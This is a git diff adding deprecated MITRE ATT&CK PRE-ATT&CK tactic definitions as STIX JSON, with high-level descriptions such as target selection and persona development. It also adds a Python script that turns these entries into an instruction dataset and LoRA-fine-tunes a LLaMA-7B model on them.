+ "source_name": "mitre-attack"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_shortname": "priority-definition-direction",
+ "type": "x-mitre-tactic",
+ "modified": "2020-10-22T15:32:47.554Z",
+ "created": "2018-10-17T00:14:20.652Z",
+ "x_mitre_deprecated": true
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--2289489d-8824-42fb-8c94-411aca6f664c.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--2289489d-8824-42fb-8c94-411aca6f664c.json
new file mode 100644
index 0000000000000000000000000000000000000000..8d1f8b87a8b89863f3ec80eb6dc852b271f1266e
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--2289489d-8824-42fb-8c94-411aca6f664c.json
@@ -0,0 +1,28 @@
+{
+ "type": "bundle",
+ "id": "bundle--024a0c80-47a5-4b79-b113-e5aec2deb413",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "x-mitre-tactic--2289489d-8824-42fb-8c94-411aca6f664c",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Establish & Maintain Infrastructure",
+ "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0022/).\n\nEstablishing and maintaining infrastructure consists of building, purchasing, co-opting, and maintaining systems and services used to conduct cyber operations. An adversary will need to establish infrastructure used to communicate with and control assets used throughout the course of their operations.",
+ "external_references": [
+ {
+ "external_id": "TA0022",
+ "url": "https://attack.mitre.org/tactics/TA0022",
+ "source_name": "mitre-attack"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_shortname": "establish-&-maintain-infrastructure",
+ "type": "x-mitre-tactic",
+ "modified": "2020-10-22T15:37:16.235Z",
+ "created": "2018-10-17T00:14:20.652Z",
+ "x_mitre_deprecated": true
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--4652199e-eef5-4523-bd18-2b5070f56cd8.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--4652199e-eef5-4523-bd18-2b5070f56cd8.json
new file mode 100644
index 0000000000000000000000000000000000000000..ebc5a1ed15b944fd24ba7d2cb3ab0b17662d4c82
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--4652199e-eef5-4523-bd18-2b5070f56cd8.json
@@ -0,0 +1,28 @@
+{
+ "type": "bundle",
+ "id": "bundle--a89005e4-f054-4029-870a-48de202cc7da",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "x-mitre-tactic--4652199e-eef5-4523-bd18-2b5070f56cd8",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Adversary OPSEC",
+ "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0021/).\n\nAdversary OPSEC consists of the use of various technologies or 3rd party services to obfuscate, hide, or blend in with accepted network traffic or system behavior. The adversary may use these techniques to evade defenses, reduce attribution, minimize discovery, and/or increase the time and effort required to analyze.",
+ "external_references": [
+ {
+ "external_id": "TA0021",
+ "url": "https://attack.mitre.org/tactics/TA0021",
+ "source_name": "mitre-attack"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_shortname": "adversary-opsec",
+ "type": "x-mitre-tactic",
+ "modified": "2020-10-22T15:36:37.579Z",
+ "created": "2018-10-17T00:14:20.652Z",
+ "x_mitre_deprecated": true
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--84f3ed3d-c72f-45d8-a3b8-4c18c2b188e6.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--84f3ed3d-c72f-45d8-a3b8-4c18c2b188e6.json
new file mode 100644
index 0000000000000000000000000000000000000000..a153075281d09ff2f19ddb6fc3f491162d1d1174
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--84f3ed3d-c72f-45d8-a3b8-4c18c2b188e6.json
@@ -0,0 +1,28 @@
+{
+ "type": "bundle",
+ "id": "bundle--3e18b777-3d83-448b-aeaf-32f2994adb81",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "x-mitre-tactic--84f3ed3d-c72f-45d8-a3b8-4c18c2b188e6",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Target Selection",
+ "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0014/).\n\nTarget selection consists of an iterative process in which an adversary determines a target by first beginning at the strategic level and then narrowing down operationally and tactically until a specific target is chosen.\u00a0 A target may be defined as an entity or object that performs a function considered for possible engagement or other action.",
+ "external_references": [
+ {
+ "external_id": "TA0014",
+ "url": "https://attack.mitre.org/tactics/TA0014",
+ "source_name": "mitre-attack"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_shortname": "target-selection",
+ "type": "x-mitre-tactic",
+ "modified": "2020-10-22T15:33:25.361Z",
+ "created": "2018-10-17T00:14:20.652Z",
+ "x_mitre_deprecated": true
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--97689bbd-d5c4-4293-bde7-f11750cea2ec.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--97689bbd-d5c4-4293-bde7-f11750cea2ec.json
new file mode 100644
index 0000000000000000000000000000000000000000..6afb9e4c1a3262653c90310c7a7a56a5e09ea93e
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--97689bbd-d5c4-4293-bde7-f11750cea2ec.json
@@ -0,0 +1,28 @@
+{
+ "type": "bundle",
+ "id": "bundle--4abb5206-a01e-42f1-b77d-56ba4b60add7",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "x-mitre-tactic--97689bbd-d5c4-4293-bde7-f11750cea2ec",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Technical Weakness Identification",
+ "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0018/).\n\nTechnical weakness identification consists of identifying and analyzing weaknesses and vulnerabilities collected during the intelligence gathering phases to determine best approach based on technical complexity and adversary priorities (e.g., expediency, stealthiness).",
+ "external_references": [
+ {
+ "external_id": "TA0018",
+ "url": "https://attack.mitre.org/tactics/TA0018",
+ "source_name": "mitre-attack"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_shortname": "technical-weakness-identification",
+ "type": "x-mitre-tactic",
+ "modified": "2020-10-22T15:35:24.309Z",
+ "created": "2018-10-17T00:14:20.652Z",
+ "x_mitre_deprecated": true
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--b2a086f2-d3db-408b-b4d4-e09a1c84f940.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--b2a086f2-d3db-408b-b4d4-e09a1c84f940.json
new file mode 100644
index 0000000000000000000000000000000000000000..47ef18cce70f2e52e42ba8f71005457c8cb7d357
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--b2a086f2-d3db-408b-b4d4-e09a1c84f940.json
@@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--2998b7c9-4fcd-44c8-881c-0ba309f4c993", + "spec_version": "2.0", + "objects": [ + { + "id": "x-mitre-tactic--b2a086f2-d3db-408b-b4d4-e09a1c84f940", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Priority Definition Planning", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0012/).\n\nPriority definition planning consists of the process of determining the set of Key Intelligence Topics (KIT) or Key Intelligence Questions (KIQ) required for meeting key strategic, operational, or tactical goals. Leadership outlines the priority definition (may be considered a goal) around which the adversary designs target selection and a plan to achieve. An analyst may outline the priority definition when in the course of determining gaps in existing KITs or KIQs.", + "external_references": [ + { + "external_id": "TA0012", + "url": "https://attack.mitre.org/tactics/TA0012", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "priority-definition-planning", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:31:37.810Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--b9f8a273-6167-47cb-89e6-02774d067e24.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--b9f8a273-6167-47cb-89e6-02774d067e24.json new file mode 100644 index 0000000000000000000000000000000000000000..ac29d6b7d410492e0566bbf4e12d9decbc6e2572 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--b9f8a273-6167-47cb-89e6-02774d067e24.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--20798ee1-0b3b-4ed2-b482-9593e61514da", + "spec_version": "2.0", + "objects": [ + { + "id": "x-mitre-tactic--b9f8a273-6167-47cb-89e6-02774d067e24", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Organizational Information Gathering", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0017/).\n\nOrganizational information gathering consists of the process of identifying critical organizational elements of intelligence an adversary will need about a target in order to best attack.\u00a0 Similar to competitive intelligence, organizational intelligence gathering focuses on understanding the operational tempo of an organization and gathering a deep understanding of the organization and how it operates, in order to best develop a strategy to target it.", + "external_references": [ + { + "external_id": "TA0017", + "url": "https://attack.mitre.org/tactics/TA0017", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "organizational-information-gathering", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:34:54.996Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--bc5c0e21-7c93-4809-a01e-249bcc42b0a2.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--bc5c0e21-7c93-4809-a01e-249bcc42b0a2.json new file mode 100644 index 0000000000000000000000000000000000000000..3cbf6aec91b50be8eb5faedd4d79db54d8f483fa --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--bc5c0e21-7c93-4809-a01e-249bcc42b0a2.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--f05d626c-1639-44e8-9352-f66fac74afbc", + "spec_version": "2.0", + "objects": [ + { + "id": "x-mitre-tactic--bc5c0e21-7c93-4809-a01e-249bcc42b0a2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test Capabilities", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0025/).\n\nTesting capabilities takes place when adversaries may need to test capabilities externally to refine development goals and criteria and to ensure success during an operation. Certain testing may be done after a capability is staged.", + "external_references": [ + { + "external_id": "TA0025", + "url": "https://attack.mitre.org/tactics/TA0025", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "test-capabilities", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:38:29.580Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--c6b17c99-31c1-490a-8b2b-a79502d6131b.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--c6b17c99-31c1-490a-8b2b-a79502d6131b.json new file mode 100644 index 0000000000000000000000000000000000000000..96f2a575b3bbdf535a60f11248c96190baca9b48 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--c6b17c99-31c1-490a-8b2b-a79502d6131b.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--6cc98a65-3516-48c4-82b8-0f0f21bf5ff4", + "spec_version": "2.0", + "objects": [ + { + "id": "x-mitre-tactic--c6b17c99-31c1-490a-8b2b-a79502d6131b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Organizational Weakness Identification", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0020/).\n\nOrganizational weakness identification consists of identifying and analyzing weaknesses and vulnerabilities from the intelligence gathering phases which can be leveraged to gain access to target or intermediate target organizations of interest.", + "external_references": [ + { + "external_id": "TA0020", + "url": "https://attack.mitre.org/tactics/TA0020", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "organizational-weakness-identification", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:36:16.863Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--d3909f10-8193-4a94-9bbb-1f2d5cb2373e.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--d3909f10-8193-4a94-9bbb-1f2d5cb2373e.json new file mode 100644 index 0000000000000000000000000000000000000000..5dbf205983a50d21ccc2bd4924961567817c5614 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--d3909f10-8193-4a94-9bbb-1f2d5cb2373e.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--e685313a-1616-4c87-977f-210b9342452a", + "spec_version": "2.0", + "objects": [ + { + "id": "x-mitre-tactic--d3909f10-8193-4a94-9bbb-1f2d5cb2373e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Persona Development", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0023/).\n\nPersona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.", + "external_references": [ + { + "external_id": "TA0023", + "url": "https://attack.mitre.org/tactics/TA0023", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "persona-development", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:37:42.444Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--d849365b-3496-4e5c-b599-019da1b35266.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--d849365b-3496-4e5c-b599-019da1b35266.json new file mode 100644 index 0000000000000000000000000000000000000000..e6feae6862db3e3a1b298c82e5df58802e1b743e --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--d849365b-3496-4e5c-b599-019da1b35266.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--49f23383-84a2-4f8e-97b9-ee6d91e611fb", + "spec_version": "2.0", + "objects": [ + { + "id": "x-mitre-tactic--d849365b-3496-4e5c-b599-019da1b35266", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Build Capabilities", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0024/).\n\nBuilding capabilities consists of developing and/or acquiring the software, data and techniques used at different phases of an operation. This is the process of identifying development requirements and implementing solutions such as malware, delivery mechanisms, obfuscation/cryptographic protections, and call back and O&M functions.", + "external_references": [ + { + "external_id": "TA0024", + "url": "https://attack.mitre.org/tactics/TA0024", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "build-capabilities", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:38:02.517Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--d8c84771-a3fa-4f64-914e-4db3a2be2607.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--d8c84771-a3fa-4f64-914e-4db3a2be2607.json new file mode 100644 index 0000000000000000000000000000000000000000..31d0f564a030ba60e740fd1600f3c54e832f1b15 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--d8c84771-a3fa-4f64-914e-4db3a2be2607.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--ff08b219-32a0-46c0-9668-b50473234545", + "spec_version": "2.0", + "objects": [ + { + "id": "x-mitre-tactic--d8c84771-a3fa-4f64-914e-4db3a2be2607", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Stage Capabilities", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0026/).\n\nStaging capabilities consists of preparing operational environment required to conduct the operation. This includes activities such as deploying software, uploading data, enabling command and control infrastructure.", + "external_references": [ + { + "external_id": "TA0026", + "url": "https://attack.mitre.org/tactics/TA0026", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "stage-capabilities", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:38:57.122Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--d90bd741-2edb-4e74-8a6f-435143ad7bbb.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--d90bd741-2edb-4e74-8a6f-435143ad7bbb.json new file mode 100644 index 0000000000000000000000000000000000000000..152e3476744e5bb8ccb1c1944b76c71cf7746fe3 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--d90bd741-2edb-4e74-8a6f-435143ad7bbb.json 
@@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--4cd040f0-6307-4145-ad8d-784daf1b8735", + "spec_version": "2.0", + "objects": [ + { + "id": "x-mitre-tactic--d90bd741-2edb-4e74-8a6f-435143ad7bbb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "People Information Gathering", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0016/).\n\nPeople Information Gathering consists of the process of identifying critical personnel elements of intelligence an adversary will need about a target in order to best attack.\u00a0 People intelligence gathering focuses on identifying key personnel or individuals with critical accesses in order to best approach a target for attack.\u00a0 It may involve aspects of social engineering, elicitation, mining social media sources, or be thought of as understanding the personnel element of competitive intelligence.", + "external_references": [ + { + "external_id": "TA0016", + "url": "https://attack.mitre.org/tactics/TA0016", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "people-information-gathering", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:34:26.736Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--f30c2753-e6b2-4186-818d-99b8b1a0322b.json b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--f30c2753-e6b2-4186-818d-99b8b1a0322b.json new file mode 100644 index 0000000000000000000000000000000000000000..c24beede36e123443a47175a4b14af37e0da974b --- /dev/null 
+++ b/cti-ATT-CK-v13.1/pre-attack/x-mitre-tactic/x-mitre-tactic--f30c2753-e6b2-4186-818d-99b8b1a0322b.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--c6452ab5-5581-42c0-b059-da38dfccdb10", + "spec_version": "2.0", + "objects": [ + { + "id": "x-mitre-tactic--f30c2753-e6b2-4186-818d-99b8b1a0322b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "People Weakness Identification", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/tactics/TA0019/).\n\nPeople weakness identification consists of identifying and analyzing weaknesses and vulnerabilities from the intelligence gathering phases which can be leveraged to gain access to target or intermediate target persons of interest or social trust relationships.", + "external_references": [ + { + "external_id": "TA0019", + "url": "https://attack.mitre.org/tactics/TA0019", + "source_name": "mitre-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_shortname": "people-weakness-identification", + "type": "x-mitre-tactic", + "modified": "2020-10-22T15:35:52.355Z", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/main.py b/main.py new file mode 100644 index 0000000000000000000000000000000000000000..4be52a80d5885469e10852c8c6a113968bd97092 --- /dev/null +++ b/main.py 
@@ -0,0 +1,234 @@ +import json +import transformers +import textwrap +from transformers import LlamaTokenizer, LlamaForCausalLM +import os +import sys +from typing import List + +from peft import ( + LoraConfig, + get_peft_model, + get_peft_model_state_dict, + prepare_model_for_int8_training, +) + +import fire +import torch +from datasets import load_dataset +import pandas as pd + +import matplotlib.pyplot as plt +import matplotlib as mpl +import seaborn as sns +from pylab import rcParams + +sns.set(rc={'figure.figsize': (10, 7)}) +sns.set(rc={'figure.dpi': 100}) +sns.set(style='white', palette='muted', font_scale=1.2) + +DEVICE = "cuda" if torch.cuda.is_available() else "cpu" +print(DEVICE) + + +def find_files(directory): + file_list = [] + for root, dirs, files in os.walk(directory): + for file in files: + file_path = os.path.join(root, file) + file_list.append(file_path) + return file_list + + +def load_all_mitre_dataset(filepath): + res = [] + for file in find_files(filepath): + # print(file) + if file.endswith(".json"): + # filename = os.path.join(filepath, file) + data = json.load(open(file)) + for object_data in data["objects"]: + if "name" in object_data: + # print(object_data["name"]) + res.append(object_data) + return res + + +loaded_data = load_all_mitre_dataset("./cti-ATT-CK-v13.1") +print("[+] ALL FILES: ", len(loaded_data)) +# print(loaded_data[0]) + + +""" + { + "instruction": "What is", + "input": "field definition", + "output": "field ) + } +""" + + +def formal_dataset(loaded_data): + res = [] + print(loaded_data[0]) + for data in loaded_data: + try: + # print(object_data["name"]) + res.append({ + "instruction": "What is", + "input": data["name"], + "output": data["description"] + }) + except: + pass + # print(len(res)) + return res + + +dataset_data = formal_dataset(loaded_data) +print("[+] DATASET LEN: ", len(dataset_data)) +print(dataset_data[0]) + +with open("mitre-dataset.json", "w") as f: + json.dump(dataset_data, f) + + +BASE_MODEL = 
"decapoda-research/llama-7b-hf" + +model = LlamaForCausalLM.from_pretrained( + BASE_MODEL, + load_in_8bit=True, + torch_dtype=torch.float16, + device_map="auto", +) + +tokenizer = LlamaTokenizer.from_pretrained(BASE_MODEL) + +tokenizer.pad_token_id = ( + 0 # unk. we want this to be different from the eos token +) +tokenizer.padding_side = "left" + +data = load_dataset("json", data_files="mitre-dataset.json") +print(data["train"]) + + +def generate_prompt(data_point): + return f"""Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request. # noqa: E501 +### Instruction: +{data_point["instruction"]} +### Input: +{data_point["input"]} +### Response: +{data_point["output"]}""" + + +CUTOFF_LEN = 256 + + +def tokenize(prompt, add_eos_token=True): + result = tokenizer( + prompt, + truncation=True, + max_length=CUTOFF_LEN, + padding=False, + return_tensors=None, + ) + if ( + result["input_ids"][-1] != tokenizer.eos_token_id + and len(result["input_ids"]) < CUTOFF_LEN + and add_eos_token + ): + result["input_ids"].append(tokenizer.eos_token_id) + result["attention_mask"].append(1) + + result["labels"] = result["input_ids"].copy() + + return result + + +def generate_and_tokenize_prompt(data_point): + full_prompt = generate_prompt(data_point) + tokenized_full_prompt = tokenize(full_prompt) + return tokenized_full_prompt + + +train_val = data["train"].train_test_split( + test_size=200, shuffle=True, seed=42 +) +train_data = ( + train_val["train"].map(generate_and_tokenize_prompt) +) +val_data = ( + train_val["test"].map(generate_and_tokenize_prompt) +) + +LORA_R = 8 +LORA_ALPHA = 16 +LORA_DROPOUT = 0.05 +LORA_TARGET_MODULES = [ + "q_proj", + "v_proj", +] + +BATCH_SIZE = 128 +MICRO_BATCH_SIZE = 4 +GRADIENT_ACCUMULATION_STEPS = BATCH_SIZE // MICRO_BATCH_SIZE +LEARNING_RATE = 3e-4 +TRAIN_STEPS = 300 +OUTPUT_DIR = "experiments" + +model = prepare_model_for_int8_training(model) +config 
= LoraConfig( + r=LORA_R, + lora_alpha=LORA_ALPHA, + target_modules=LORA_TARGET_MODULES, + lora_dropout=LORA_DROPOUT, + bias="none", + task_type="CAUSAL_LM", +) +model = get_peft_model(model, config) +model.print_trainable_parameters() + +training_arguments = transformers.TrainingArguments( + per_device_train_batch_size=MICRO_BATCH_SIZE, + gradient_accumulation_steps=GRADIENT_ACCUMULATION_STEPS, + warmup_steps=100, + max_steps=TRAIN_STEPS, + learning_rate=LEARNING_RATE, + fp16=True, + logging_steps=10, + optim="adamw_torch", + evaluation_strategy="steps", + save_strategy="steps", + eval_steps=50, + save_steps=50, + output_dir=OUTPUT_DIR, + save_total_limit=3, + load_best_model_at_end=True, + report_to="tensorboard" +) + +data_collator = transformers.DataCollatorForSeq2Seq( + tokenizer, pad_to_multiple_of=8, return_tensors="pt", padding=True +) + +trainer = transformers.Trainer( + model=model, + train_dataset=train_data, + eval_dataset=val_data, + args=training_arguments, + data_collator=data_collator +) +model.config.use_cache = False +old_state_dict = model.state_dict +model.state_dict = ( + lambda self, *_, **__: get_peft_model_state_dict( + self, old_state_dict() + ) +).__get__(model, type(model)) + +model = torch.compile(model) + +trainer.train() +model.save_pretrained(OUTPUT_DIR) diff --git a/mitre-dataset.json b/mitre-dataset.json new file mode 100644 index 0000000000000000000000000000000000000000..bb2f8f35bb1621470950e59284545b25519d2008 --- /dev/null +++ b/mitre-dataset.json 
